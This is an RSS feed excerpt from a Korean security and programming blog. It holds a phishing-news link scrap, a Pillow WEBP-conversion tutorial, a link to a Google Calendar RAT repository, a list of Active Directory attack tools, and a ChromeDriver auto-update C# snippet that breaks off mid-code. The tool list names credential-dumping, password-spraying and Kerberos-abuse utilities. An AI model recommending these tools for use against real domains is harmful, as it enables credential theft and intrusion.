&lt;figure id=&quot;og_1731508219183&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;획기적인 위협이 될 새로운 피싱 도구 고이슈, 깃허브의 개발자들 노려&quot; data-og-description=&quot;보안 외신 해커뉴스에 의하면 새로운 피싱 도구가 등장했다고 한다. 이름은 고이슈(GoIssue)로, 깃허브에서 활동하는 개발자들을 주로 노리는 도구로 분석됐다. 고이슈는 대량의 피싱 메일을 발송&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=134288&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=134288&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/5D0um/hyXzQjV1c5/MqwnPE4C1KBYcqAUmYbhRk/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot;&gt;&lt;a href=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=134288&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=134288&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/5D0um/hyXzQjV1c5/MqwnPE4C1KBYcqAUmYbhRk/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;획기적인 위협이 될 새로운 피싱 도구 고이슈, 깃허브의 개발자들 노려&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;보안 외신 해커뉴스에 의하면 새로운 피싱 도구가 등장했다고 한다. 이름은 고이슈(GoIssue)로, 깃허브에서 활동하는 개발자들을 주로 노리는 도구로 분석됐다. 고이슈는 대량의 피싱 메일을 발송&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;m.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1731508223289&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Phishing Tool GoIssue Targets Developers on GitHub&quot; data-og-description=&quot;New phishing tool GoIssue targets GitHub, enabling mass phishing, and has been linked to the GitLoker extortion campaign&quot; data-og-host=&quot;www.infosecurity-magazine.com&quot; data-og-source-url=&quot;https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/&quot; data-og-url=&quot;https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bsiEJu/hyXzKYklFm/GZUasGtRnhUsSSwGJUkdGk/img.jpg?width=300&amp;amp;height=300&amp;amp;face=0_0_300_300&quot;&gt;&lt;a href=&quot;https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.infosecurity-magazine.com/news/phishing-goissue-targets-github/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bsiEJu/hyXzKYklFm/GZUasGtRnhUsSSwGJUkdGk/img.jpg?width=300&amp;amp;height=300&amp;amp;face=0_0_300_300');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Phishing Tool GoIssue Targets Developers on GitHub&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;New phishing tool GoIssue targets GitHub, enabling mass phishing, and has been linked to the GitLoker extortion campaign&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.infosecurity-magazine.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://www.darkreading.com/cloud-security/goissue-cybercrime-tool-github-developers-en-masse&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.darkreading.com/cloud-security/goissue-cybercrime-tool-github-developers-en-masse&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>스크랩</category>
      <category>github</category>
      <category>go</category>
      <category>goissue</category>
      <category>malware</category>
      <category>깃허브</category>
      <category>악성코드</category>
      <category>오블완</category>
      <category>티스토리챌린지</category>
      <category>피싱</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/66</guid>
      <comments>https://a2sembly.tistory.com/66#entry66comment</comments>
      <pubDate>Thu, 14 Nov 2024 00:02:36 +0900</pubDate>
    </item>
    <item>
      <title>Python: WEBP to JPG/PNG - WEBP 확장자를 JPG/PNG로!</title>
      <link>https://a2sembly.tistory.com/65</link>
      <description>&lt;h2 data-ke-size=&quot;size26&quot;&gt; ️ WEBP란?&lt;/h2&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;WEBP는 Google에서 개발한 이미지 파일 형식으로, 압축 효율이 높아 웹 페이지의 로딩 속도를 빠르게 해줍니다.&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;&amp;nbsp;BUT.... &lt;span style=&quot;background-color: #fcfcfc; color: #666666; text-align: left;&quot;&gt;일부 프로그램은 WEBP를 지원하지 않으므로, 다른 형식으로 변환이 필요할 수 있습니다.&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Python에서 이미지를 처리하기 위한 대표적인 라이브러리로는 Pillow와 OpenCV가 있습니다. 이 글에서는 설치와 사용이 간편한 Pillow를 활용한 변환 방법을 소개합니다.&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;1️⃣ Pillow 설치 및 설정 방법&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Pillow는 다음과 같은 명령어로 설치할 수 있습니다.&lt;/p&gt;
&lt;pre id=&quot;code_1731429840067&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;pip install pillow&lt;/code&gt;&lt;/pre&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;1️⃣.1️⃣ JPG로 변환하기&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다음은 Python 코드로 WEBP 이미지를 JPG로 변환하는 방법입니다.&lt;/p&gt;
&lt;pre id=&quot;code_1731429890601&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from PIL import Image

# WEBP 이미지를 불러와 JPG로 저장
input_image = &quot;image.webp&quot;
output_image = &quot;image.jpg&quot;

# 이미지 열기
with Image.open(input_image) as img:
    img.convert(&quot;RGB&quot;).save(output_image, &quot;JPEG&quot;)&lt;/code&gt;&lt;/pre&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;1️⃣.2️⃣ PNG로 변환하는 방법&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;WEBP 이미지를 PNG 형식으로 저장하려면, JPEG 대신 PNG를 지정하면 됩니다.&lt;/p&gt;
&lt;pre id=&quot;code_1731429972733&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;output_image = &quot;image.png&quot;

with Image.open(input_image) as img:
    img.save(output_image, &quot;PNG&quot;)&lt;/code&gt;&lt;/pre&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;1️⃣.3️⃣ 여러 파일을 일괄 변환하는 방법&lt;/span&gt;&lt;/h3&gt;
&lt;pre id=&quot;code_1731430000108&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;import os
from PIL import Image

input_folder = &quot;input_images&quot;
output_folder = &quot;output_images&quot;

for filename in os.listdir(input_folder):
    if filename.endswith(&quot;.webp&quot;):
        input_image = os.path.join(input_folder, filename)
        output_image = os.path.join(output_folder, f&quot;{os.path.splitext(filename)[0]}.jpg&quot;)
        
        with Image.open(input_image) as img:
            img.convert(&quot;RGB&quot;).save(output_image, &quot;JPEG&quot;)&lt;/code&gt;&lt;/pre&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;1️⃣.4️⃣ 해상도 및 품질 조정&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;save 함수에 quality 옵션을 통해 품질을 조절할 수 있으며, resize 함수로 해상도를 조절할 수 있습니다.&lt;/p&gt;
&lt;pre id=&quot;code_1731430101813&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;img_resized = img.resize((800, 600))
img_resized.save(output_image, &quot;JPEG&quot;, quality=85)&lt;/code&gt;&lt;/pre&gt;</description>
      <category>공부/Programming</category>
      <category>convert</category>
      <category>JPG</category>
      <category>PiL</category>
      <category>png</category>
      <category>python</category>
      <category>webp</category>
      <category>오블완</category>
      <category>이미지 변환</category>
      <category>티스토리챌린지</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/65</guid>
      <comments>https://a2sembly.tistory.com/65#entry65comment</comments>
      <pubDate>Wed, 13 Nov 2024 01:50:14 +0900</pubDate>
    </item>
    <item>
      <title>구글 캘린더를 이용한 RAT - GCR</title>
      <link>https://a2sembly.tistory.com/63</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;점점 정상 클라우드 서비스를 C2로 사용하는 악성코드가 많이 등장하는 것 같다..&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;타임라인 분석 시 좀 더 상세하게 확인해야 할 필요가 늘고 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;858&quot; data-origin-height=&quot;641&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zMrSM/btsz9lu9mZ2/uHjn94m7KhMYtcaz47Lojk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zMrSM/btsz9lu9mZ2/uHjn94m7KhMYtcaz47Lojk/img.png&quot; data-alt=&quot;GCR - Google Calendar RAT Github&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zMrSM/btsz9lu9mZ2/uHjn94m7KhMYtcaz47Lojk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzMrSM%2Fbtsz9lu9mZ2%2FuHjn94m7KhMYtcaz47Lojk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;858&quot; height=&quot;641&quot; data-origin-width=&quot;858&quot; data-origin-height=&quot;641&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;GCR - Google Calendar RAT Github&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;아래는 Github 주소&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;https://github.com/MrSaighnal/GCR-Google-Calendar-RAT&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>공부/ETC</category>
      <category>악성코드</category>
      <category>침해사고</category>
      <category>클라우드</category>
      <category>포렌식</category>
      <category>해킹</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/63</guid>
      <comments>https://a2sembly.tistory.com/63#entry63comment</comments>
      <pubDate>Fri, 10 Nov 2023 18:58:59 +0900</pubDate>
    </item>
    <item>
      <title>Active Directroy 관련 공격 도구</title>
      <link>https://a2sembly.tistory.com/62</link>
      <description>&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/spraykatz&quot;&gt;&lt;b&gt;spraykatz&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Credentials gathering tool automating remote procdump and parse of lsass process.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/BloodHound&quot;&gt;&lt;b&gt;BloodHound&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Six Degrees of Domain Admin.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/CrackMapExec&quot;&gt;&lt;b&gt;CrackMapExec&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;A swiss army knife for pentesting networks.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/pywerview&quot;&gt;&lt;b&gt;pywerview&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;A (partial) Python rewriting of PowerSploit's PowerView.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/Prenum&quot;&gt;&lt;b&gt;Prenum&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;The perils of the pre-Windows 2000 compatible access group in a Windows domain.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/adPEAS&quot;&gt;&lt;b&gt;adPEAS&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Powershell tool to automate Active Directory enumeration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/CypherDog&quot;&gt;&lt;b&gt;CypherDog&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;PowerShell Cmdlets to interact with BloodHound Data via Neo4j HTTP API.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/Invoke-ADEnum&quot;&gt;&lt;b&gt;Invoke-ADEnum&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Automate Active Directory Enumeration using PowerView.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/LDAPNomNom&quot;&gt;&lt;b&gt;LDAPNomNom&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Anonymously bruteforce Active Directory usernames by abusing LDAP Ping requests.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/lsassy&quot;&gt;&lt;b&gt;lsassy&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Python tool to remotely extract credentials on a set of hosts.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/o365recon&quot;&gt;&lt;b&gt;o365recon&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Retrieve information via O365 and AzureAD with valid credentials.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/LDAP%20Password%20Hunter&quot;&gt;&lt;b&gt;LDAP Password Hunter&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Password Hunter in active directory.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/FindUncommonShares&quot;&gt;&lt;b&gt;FindUncommonShares&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Quickly find uncommon shares in vast Windows domains.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/ADRecon&quot;&gt;&lt;b&gt;ADRecon&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Gather information about the Active Directory and generates a report.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/AzureADLateralMovement&quot;&gt;&lt;b&gt;AzureADLateralMovement&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Lateral movement graph for Azure Active Directory.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/Snaffler&quot;&gt;&lt;b&gt;Snaffler&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;A tool to help at finding delicious candy needles in a bunch of horrible boring haystacks.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/RidRelay&quot;&gt;&lt;b&gt;RidRelay&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Enumerate usernames on a domain where you have no creds by using SMB relay.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/jackdaw&quot;&gt;&lt;b&gt;jackdaw&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Gather gather gather.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/WinPwn&quot;&gt;&lt;b&gt;WinPwn&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Automation for internal Windows pentest / AD-Security.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/ADRT&quot;&gt;&lt;b&gt;ADRT&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Active Directory Report Tool.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/SharpHose&quot;&gt;&lt;b&gt;SharpHose&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Asynchronous password spraying tool for Windows environments.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/windapsearch&quot;&gt;&lt;b&gt;windapsearch&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Enumerate users, groups and computers from a Windows domain through LDAP queries.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/Rubeus&quot;&gt;&lt;b&gt;Rubeus&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Rubeus is a toolkit for Kerberos interaction and abuses.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/linWinPwn&quot;&gt;&lt;b&gt;linWinPwn&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Automates a number of Active Directory enumeration and vulnerability.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/msldap&quot;&gt;&lt;b&gt;msldap&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;LDAP library for auditing Microsoft Active Directory.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/ADAPE%20Script&quot;&gt;&lt;b&gt;ADAPE Script&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Active Directory assessment and privilege escalation script.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/ADReaper&quot;&gt;&lt;b&gt;ADReaper&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Enumerate an Active Directory environment with LDAP queries.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://offsec.tools/tool/ADenum&quot;&gt;&lt;b&gt;ADenum&lt;/b&gt;&lt;/a&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Find misconfiguration through LDAP to exploit weaknesses with Kerberos.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;</description>
      <category>공부/ETC</category>
      <author>a2sembly</author>
      <guid isPermaLink="true">https://a2sembly.tistory.com/62</guid>
      <comments>https://a2sembly.tistory.com/62#entry62comment</comments>
      <pubDate>Thu, 17 Aug 2023 18:01:01 +0900</pubDate>
    </item>
    <item>
      <title>C# Selenium 자동 업데이트</title>
      <link>https://a2sembly.tistory.com/61</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;1. Chrome Version 확인&lt;/p&gt;
&lt;pre id=&quot;code_1692171369958&quot; class=&quot;csharp&quot; data-ke-language=&quot;csharp&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;private static string GetChromeVersion()
        {
            // Note: Chrome must be installed in the default location
            string keyPath = @&quot;SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe&quot;;
            string result = null;

            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(keyPath))
            {
                if (key == null)
                {
                    MessageBox.Show(&quot;Chrome 브라우저가 설치되어 있지 않거나, 기본 경로 설치 경로가 아닙니다.\nChrome 브라우저를 재설치 해주세요.&quot;, &quot;Error&quot;, MessageBoxButtons.OK, MessageBoxIcon.Error);
                    Application.ExitThread();
                }
                object executablePath = null;
                if (key != null) { executablePath = key.GetValue(&quot;&quot;); }
                if (executablePath == null)
                {
                    MessageBox.Show(&quot;Chrome 브라우저가 설치되어 있지 않거나, 기본 경로 설치 경로가 아닙니다.\nChrome 브라우저를 재설치 해주세요.&quot;, &quot;Error&quot;, MessageBoxButtons.OK, MessageBoxIcon.Error);
                    Application.ExitThread();
                }
                else
                {
                    FileVersionInfo versionInfo = FileVersionInfo.GetVersionInfo(executablePath.ToString());
                    result = versionInfo.FileVersion;
                }
            }

            return result;
        }&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. Selenium Driver 버전 확인&lt;/p&gt;
&lt;pre id=&quot;code_1692171394155&quot; class=&quot;csharp&quot; data-ke-language=&quot;csharp&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;private static string GetSeleniumVersion()
        {
            string driverPath = Path.Combine(Setting.CurrentDirectory, &quot;chromedriver.exe&quot;);
            string result = null;

            ProcessStartInfo startInfo = new ProcessStartInfo
            {
                FileName = driverPath,
                Arguments = &quot;--version&quot;,
                UseShellExecute = false,
                RedirectStandardOutput = true,
                CreateNoWindow = true
            };

            Process process = new Process
            {
                StartInfo = startInfo
            };

            process.Start();

            while (!process.StandardOutput.EndOfStream)
            {
                result = process.StandardOutput.ReadLine();
            }

            process.WaitForExit();
            string pattern = @&quot;(?&amp;lt;=ChromeDriver )(.*?)(?= \()&quot;;
            Match match = Regex.Match(result, pattern);

            if (match.Success)
            {
                result = match.Value;
            }
            return result;
        }&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. 버전 비교 및 업데이트&lt;/p&gt;
&lt;pre id=&quot;code_1692171412501&quot; class=&quot;csharp&quot; data-ke-language=&quot;csharp&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;public static void Download_SeleniumDriver()
        {
            var client = new WebClient();
            string zipFilePath = Path.Combine(Setting.CurrentDirectory, &quot;chromedriver_win32.zip&quot;);
            string exeFilePath = Path.Combine(Setting.CurrentDirectory, &quot;chromedriver.exe&quot;);
            string LICENSE_iFilePath = Path.Combine(Setting.CurrentDirectory, &quot;LICENSE.chromedriver&quot;);
            string majorVersion = null;
            string latest_chromedriver = null;
            string downloadUrl = null;

            string chromeVersion = GetChromeVersion();
            if (chromeVersion == null) { Application.ExitThread(); }
            else
            {
                majorVersion = chromeVersion.Substring(0, chromeVersion.LastIndexOf('.'));
                latest_chromedriver = Web.Gethtml($&quot;https://chromedriver.storage.googleapis.com/LATEST_RELEASE_{majorVersion}&quot;);
                downloadUrl = $&quot;https://chromedriver.storage.googleapis.com/{latest_chromedriver}/chromedriver_win32.zip&quot;;
                if (!File.Exists(exeFilePath))
                {
                    try
                    {
                        client.DownloadFile(downloadUrl, zipFilePath);
                        ZipFile.ExtractToDirectory(zipFilePath, Setting.CurrentDirectory);
                    }
                    catch
                    {
                        if (File.Exists(zipFilePath)) { File.Delete(zipFilePath); }
                        if (File.Exists(LICENSE_iFilePath)) { File.Delete(LICENSE_iFilePath); }
                        MessageBox.Show(&quot;Chromedriver를 정상 다운로드 할 수 없습니다.\n인터넷 연결 확인 후 재실행하거나 직접 다운로드가 필요합니다.\n프로그램 재실행 이후에도 지속적인 문제가 발생할 경우 개발자게에 문의주세요.&quot;, &quot;Error&quot;, MessageBoxButtons.OK, MessageBoxIcon.Error);
                    }
                }
            }
            string seleniumVersion = GetSeleniumVersion();

            if (seleniumVersion != latest_chromedriver)
            {
                try
                {
                    client.DownloadFile(downloadUrl, zipFilePath);
                    using (var archive = ZipFile.OpenRead(zipFilePath))
                    {
                        foreach (var entry in archive.Entries)
                        {
                            string entryPath = Path.Combine(Setting.CurrentDirectory, entry.FullName);

                            if (File.Exists(entryPath))
                                File.Delete(entryPath);

                            entry.ExtractToFile(entryPath);
                        }
                    }
                }
                catch
                {
                    if (File.Exists(zipFilePath)) { File.Delete(zipFilePath); }
                    if (File.Exists(LICENSE_iFilePath)) { File.Delete(LICENSE_iFilePath); }
